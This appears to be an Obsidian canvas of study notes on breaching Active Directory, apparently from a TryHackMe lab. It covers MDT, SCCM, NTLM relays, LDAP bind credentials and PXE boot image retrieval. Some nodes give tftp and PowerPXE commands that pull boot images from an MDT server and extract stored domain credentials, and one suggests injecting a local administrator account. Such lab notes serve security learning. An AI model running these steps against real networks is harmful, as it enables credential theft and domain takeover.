{
	"nodes":[
		{"id":"c24c4a8cf71de81d","type":"text","text":"# Microsoft Deployment Toolkit\n- Automates deployment of Microsoft OS in large organizations, streamlining image maintenance and updates centrally. \n- Primarily used for new deployments, allowing preconfiguration and management of boot images for automated setup of new machines. \n\nEg. if IT need to configure a new machine, they just need to plug in a network cable, and everything happens automatically. They can make various changes to the boot image, such as already installing default software like Office365 and the organisation's anti-virus of choice. It can also ensure that the new build is updated the first time the installation runs.\n","x":13866,"y":-1621,"width":697,"height":620},
		{"id":"240817137055f9dc","type":"text","text":"# SCCM (System Center Configuration Manager)\n- MDT is often integrated with SCCM, \n- Acts as an expansion of MDT, focusing on patch management and software updates post-installation.\n- SCCM manages updates for Microsoft applications, services, and OS.\n- SCCM enables review and testing of software updates before centralized deployment across domain-joined machines, simplifying IT team tasks.","x":14666,"y":-941,"width":843,"height":240},
		{"id":"520bbb70a18768c2","type":"file","file":"NOTES/98. Theory/LLMNR, NBT-NS, WPAD.md","x":15156,"y":-3428,"width":1399,"height":346},
		{"id":"ea91b698f6bd7cba","type":"text","text":"# Authentication Relays\n","x":14316,"y":-3082,"width":697,"height":75},
		{"id":"e6dcff97ffc56866","type":"text","text":"![[LM_NTLM_NTLMv2#Server impersonation - Capture the client response (Type 3 message) in NTLMv1 authentication protocols.]]","x":14907,"y":-2824,"width":1478,"height":1823},
		{"id":"b0b4af3b6ab6289a","type":"text","text":"![[LM_NTLM_NTLMv2#SMB Relay Attack on NTLMv1/NTLMv2]]","x":16385,"y":-2824,"width":1478,"height":2003},
		{"id":"c8768b4d510a7cf8","type":"text","text":"# Breaching AD","x":13500,"y":-3428,"width":481,"height":240,"color":"#2b65ee"},
		{"id":"046c50e25d2787db","type":"file","file":"NOTES/98. Theory/LDAP.md","x":12830,"y":-946,"width":1279,"height":826},
		{"id":"1675c1d020aa3cfc","type":"text","text":"# LDAP Bind Credentials\n","x":13121,"y":-1161,"width":697,"height":98},
		{"id":"8d92025f80a0c6e7","type":"text","text":"# Perform password scraping attacks to recover AD credentials used during the install.","x":15688,"y":73,"width":837,"height":115},
		{"id":"01822376e4e40d13","type":"text","text":"# PXE Boot Image Retrieval\n1. Initial information includes MDT server IP and BCD file names.\n1. BCD files store PXE boot configurations.\n1. The BCD files are always located in the /Tmp/ directory on the MDT server.\n1. Use TFTP to retrieve BCD files and enumerate configurations.\n\tTFTP is a bit trickier than FTP since we can't list files. Instead, we send a file request, and the server will connect back to us via UDP to transfer the file.\n\t```bash\n\t$ tftp -i <MDT_IP> GET \"\\Tmp\\{bdc_filename}.bcd\" conf.bcd\n\t```\n1. [`Powerpxe`](https://github.com/wavestone-cdt/powerpxe) - PowerShell script aids in reading BCD file contents.\n\t```powershell\n\tPS> Import-Module .\\PowerPXE.ps1\n\tPS> C:\\Users\\THM\\Documents\\am0> $BCDFile = \"conf.bcd\"\n\tPS> C:\\Users\\THM\\Documents\\am0> Get-WimFile -bcdFile $BCDFile\t\n\t```\n1. WIM files contain PXE boot images in Windows Imaging Format.\n\t```bash\n\t$ tftp -i <MDT_IP> GET \"<PXE_Boot_Image_Location>\" pxeboot.wim\n\t```\n1. Use TFTP to download PXE boot image from MDT server.\n2. Download process takes time due to the size of the bootable Windows image.","x":15789,"y":273,"width":637,"height":680},
		{"id":"75c8a3242e39b168","type":"file","file":"NOTES/98. Theory/LM_NTLM_NTLMv2.md","x":11480,"y":-2819,"width":1279,"height":939},
		{"id":"80c0771af492e369","type":"text","text":"# NTLM Authenticated Services\n","x":12424,"y":-3044,"width":697,"height":80},
		{"id":"8b8a63079275c079","type":"text","text":"# Configuration Files","x":14109,"y":-2640,"width":697,"height":76},
		{"id":"a42efa16853a5c94","type":"text","text":"# Configuration File Credentials\n## $ seatbelt\nhttps://github.com/GhostPack/Seatbelt\nenumeration scripts","x":14058,"y":-2442,"width":798,"height":222},
		{"id":"b98ee770dbb49c81","type":"text","text":"# Inject a privilege escalation vector, such as a Local Administrator account, to gain Administrative access to the OS once the PXE boot has been completed.","x":15856,"y":-560,"width":837,"height":141},
		{"id":"8fae5b11957daf8d","type":"link","url":"https://www.riskinsight-wavestone.com/en/2020/01/taking-over-windows-workstations-pxe-laps/","x":16689,"y":-155,"width":871,"height":572},
		{"id":"86e7d771a0c73502","type":"text","text":"# Recovering Credentials from a PXE Boot Image (exfiltrate stored credentials)\n```Powershell\nPS C:\\Users\\THM\\Documents\\am0> Get-FindCredentials -WimFile pxeboot.wim\n>> Open pxeboot.wim\n>>>> Finding Bootstrap.ini\n>>>> >>>> DeployRoot = \\\\THMMDT\\MTDBuildLab$\n>>>> >>>> UserID = <account>\n>>>> >>>> UserDomain = ZA\n>>>> >>>> UserPassword = <password>\n```","x":16582,"y":466,"width":1085,"height":294},
		{"id":"ff7411ebef40a40b","type":"text","text":"# PXE Boot\nPXE boot to allow new devices that are connected to the network to load and install the OS directly over a network connection.\nMDT can be used to create, manage, and host PXE boot images. PXE boot is usually integrated with DHCP, which means that if DHCP assigns an IP lease, the host is allowed to request the PXE boot image and start the network OS installation process.\n\n(5) Client performs Boot Service Discover (6) Server Acknowledge (sends PXE boot information) (7) Client requests PXE Boot via TFTP (8) Server delivers PXE Boot via TFTP (1) User sends DHCP Discover (requests IP address and PXE service info) (2) Server sends DHCP Offer (sends open IP and PXE service info) (3) User sends DHCP Request (accepts IP address) (4) Server sends DHCP Acknowledge DHCP Server\n\n```mermaid\nsequenceDiagram\n    participant MDT Server\n    participant User\n    participant DHCP Server\n    \n\tautonumber\n\t\n    User-)DHCP Server: DHCP Discover<br>(requests IP address and PXE service info)\n    DHCP Server-)User: DHCP Offer<br>(sends open IP and PXE service info)\n    User-)DHCP Server: DHCP Request<br>(accepts IP address)\n    DHCP Server-)User: DHCP Acknowledge\n\n    User-)MDT Server: Boot Service Discover\n    MDT Server-)User: Server Acknowledge<br>(sends PXE boot information)\n    User-)MDT Server: Request PXE Boot<br>via TFTP\n    MDT Server-)User: Deliver PXE Boot<br>via TFTP\n\n```","x":14417,"y":-603,"width":980,"height":1020}
	],
	"edges":[
		{"id":"b3f97f0abc7b0b2e","fromNode":"c8768b4d510a7cf8","fromSide":"bottom","toNode":"c24c4a8cf71de81d","toSide":"top"},
		{"id":"4a1ff83bc229fd64","fromNode":"c8768b4d510a7cf8","fromSide":"bottom","toNode":"1675c1d020aa3cfc","toSide":"top"},
		{"id":"9cbcef9730578504","fromNode":"c8768b4d510a7cf8","fromSide":"right","toNode":"ea91b698f6bd7cba","toSide":"left"},
		{"id":"8329ea808b43eb94","fromNode":"c8768b4d510a7cf8","fromSide":"bottom","toNode":"8b8a63079275c079","toSide":"top"},
		{"id":"de1b1538c39bbf02","fromNode":"80c0771af492e369","fromSide":"left","toNode":"75c8a3242e39b168","toSide":"top"},
		{"id":"3caad08e4f313ae1","fromNode":"ea91b698f6bd7cba","fromSide":"right","toNode":"520bbb70a18768c2","toSide":"left"},
		{"id":"96fea42536df02e2","fromNode":"ea91b698f6bd7cba","fromSide":"right","toNode":"e6dcff97ffc56866","toSide":"top"},
		{"id":"1865bdece48a429d","fromNode":"ea91b698f6bd7cba","fromSide":"right","toNode":"b0b4af3b6ab6289a","toSide":"top"},
		{"id":"f147d122d22900c9","fromNode":"c24c4a8cf71de81d","fromSide":"bottom","toNode":"240817137055f9dc","toSide":"left"},
		{"id":"59b3f85ccfd02fe2","fromNode":"c24c4a8cf71de81d","fromSide":"bottom","toNode":"ff7411ebef40a40b","toSide":"left"},
		{"id":"288762bc43c3fb84","fromNode":"ff7411ebef40a40b","fromSide":"right","toNode":"b98ee770dbb49c81","toSide":"bottom"},
		{"id":"7321df777dc3b21a","fromNode":"ff7411ebef40a40b","fromSide":"right","toNode":"8d92025f80a0c6e7","toSide":"top"},
		{"id":"3db480f602960545","fromNode":"8d92025f80a0c6e7","fromSide":"bottom","toNode":"01822376e4e40d13","toSide":"top"},
		{"id":"5bba71c5e5e7bc96","fromNode":"01822376e4e40d13","fromSide":"right","toNode":"86e7d771a0c73502","toSide":"left"},
		{"id":"c8b10599818623fa","fromNode":"8b8a63079275c079","fromSide":"bottom","toNode":"a42efa16853a5c94","toSide":"top"},
		{"id":"b5e1453a25d68837","fromNode":"c8768b4d510a7cf8","fromSide":"left","toNode":"80c0771af492e369","toSide":"right"},
		{"id":"55863a2e6f8675e4","fromNode":"1675c1d020aa3cfc","fromSide":"bottom","toNode":"046c50e25d2787db","toSide":"top"},
		{"id":"11696ea3d97cb931","fromNode":"8d92025f80a0c6e7","fromSide":"right","toNode":"8fae5b11957daf8d","toSide":"left"}
	]
}